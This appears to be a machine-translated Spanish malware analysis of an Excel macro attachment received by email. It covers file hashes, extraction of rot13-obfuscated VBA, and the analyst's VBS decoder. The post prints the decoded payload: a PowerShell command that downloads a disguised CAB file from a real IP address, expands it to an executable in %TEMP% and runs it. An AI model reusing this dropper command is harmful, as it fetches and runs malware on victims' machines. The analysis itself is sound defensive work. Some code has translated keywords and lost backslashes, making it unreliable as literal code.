Introducción
Ayer recibí en la bandeja de entrada de mi empresa un correo electrónico con un archivo .xlsm adjunto llamado D92724446.xlsm procedente de Clare588@78-83-77-53.spectrumnet.bg . Los motores AV centrales y locales no encontraron nada malicioso y un análisis multimotor obtuvo como resultado 0/57. Decidí investigar un poco más a fondo para confirmar que se trataba de un archivo malicioso y extraer al menos el código que imaginaba dentro de este documento.
Información general
Esta es alguna información general recopilada:
[plano]
Nombre:
D92724446.xlsm
MD5:
fea3ab857813c0d65cd0b6b6233a834b
SHA1:
64eef048efe86fe35f673fd2d853a8a727934e6c
SHA256:
75e3a4cd45c08ff242e2927fa3b4ee80858073aade84898040bfbb7847ef
profundo
768:qEIo/BPRS5t1dbQjlshORhynxvWXLUYJdGnSCk:qIJM8jl6nIP
Tamaño del archivo:
36,1 KB (36978 bytes)
Tipo de archivo:
Hoja de cálculo XML abierta de Office
Información total del virus:
Primera presentación:
-02-18 10:35:06UTC
Última presentación:
-02-19 08:58:57UTC
Otros nombres:
93D9B24583.xlsm
e94fcc43b0dc9c7eb350149b4ebdfd3d
61a47fa44dd55f5721ebe85aa83a32e6
I233185_486.xlsm
L335966_246.xlsm
271269885.xlsm
4501B81210.xlsm
e65fb3285617c7b4bbc833a466be6c42
5312970.xlsm
9D50B4390.xlsm
DDE1368393.xlsm
E30178611.xlsm
43c29faad6fc5984273afcc67593d802
FE731885.xlsm
C47394.xlsm
sospechoso.xls
090214399.xlsm
Q884674_740.xlsm
E015272_266.xlsm
U506714_083.xlsm
43925982.xlsm
8BB4D89313.xlsm.zip
82AC485705.xlsm
8abb99eb6078b658e05aece79337378a
0BF112.xlsm
[/plano]
Análisis estático
Comencé mi análisis echando un vistazo rápido al interior:
En el desplazamiento 0 podemos ver rápidamente 4 bytes que confirman el formato del archivo (50 4B 03 04). En este punto, intenté obtener más información y ver cómo estaba compuesto este documento:
Esto confirma rápidamente mis primeras sospechas. En el desplazamiento 0x000012f1 se encuentra un archivo .bin.
Avanzando un poco más, podemos intentar conseguir el código de estas instrucciones:
Se extrajo el código y se crearon diferentes archivos para clases y módulos en OfficeMalScannerVBAPROJECT.BIN-Macros.
Al abrir estos archivos con un editor de texto simple, inmediatamente encontré muchas instrucciones confusas, como se muestra en la imagen a continuación:
Sin embargo, después de un rápido análisis me di cuenta de que los módulos realmente importantes para extraer el código malicioso eran los números 11 y 14.
Esto se debe a que el módulo número 11 contiene las instrucciones para ejecutar el código ofuscado asignado a la variable denominada “FfdsfF” y desenmascarado mediante la llamada a función “NewQkeTzIIHM”.
“NewQkeTzIIHM” toma un parámetro de entrada como cadena y devuelve una cadena.
Estas son sus principales instrucciones:
El -13 inmediatamente recuerda un bucle de desofuscación que emplea el algoritmo rot13.
En este punto, simplemente escribí algunas líneas de código vbs para extraer correctamente el contenido e imprimirlo en un archivo txt llamado salida.txt.
[plano]
Función WriteFile(sText)
Establecer objFSO = CreateObject(“Scripting.FileSystemObject”)
Establecer objMyFile = objFSO.OpenTextFile( “C:UsersEOSecDesktopoutput.txt”, 8, verdadero, 0)
objMiArchivo.WriteLine(sText)
objMiArchivo.close()
Función final
tenue i,x,y
x = “pzq-X-]|«r `uryy;r…r-5[r«:owrp -`†€ rz;[r ;droPyvr{ 6;Q|«{y|nqSvyr54u }GB ;FC;?A@;Dx«rsr«rsstq€rrq…‡~;w}t4942aRZ]2iWVv|qsuv|VU;pno46H-r…}n{q-2aRZ]2iWVv|qsuv| VU;pno-2aRZ]2iWVv|qsuv|VU;r…rH-€ n -2aRZ]2iWVv|qsuv|VU;r…rH”
Para i = 1 a Len(x)
y = y + Chr(Asc(Medio(x, i, 1)) – 13)
Próximo
Escribir archivo(y)
[/plano]
Este es el código claro obtenido:
[plano]
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile(‘http://5.196.243.7/kwefewef/fgdsee/dxzq.jpg’,’%TEMP%JIOiodfhioIH.cab’); expanda %TEMP%JIOiodfhioIH.cab %TEMP%JIOiodfhioIH.exe; inicie %TEMP%JIOiodfhioIH.exe;
[/plano]
Y este el whois de la IP remota:
¡Conviértete en un ingeniero inverso certificado!
Obtenga capacitación práctica en vivo sobre análisis de malware desde cualquier lugar y conviértase en un analista certificado de ingeniería inversa. Comienza a aprender
inetnum 5.196.243.0 – 5.196.243.7nombre de red Just_Hostingpaís es decirdescr Sólo alojamientoadministrador-c OTC9-MADUROtecnología-c OTC9-RIPEestado PA ASIGNADOmnt-por OVH-MNTfuente MADURO # Filtrado
Se descarga un archivo llamado dxzq.jpg . En realidad, es un archivo CAB ( JIOiodfhioIH.cab) que luego se expande a JIOiodfhioIH.exe y se ejecuta.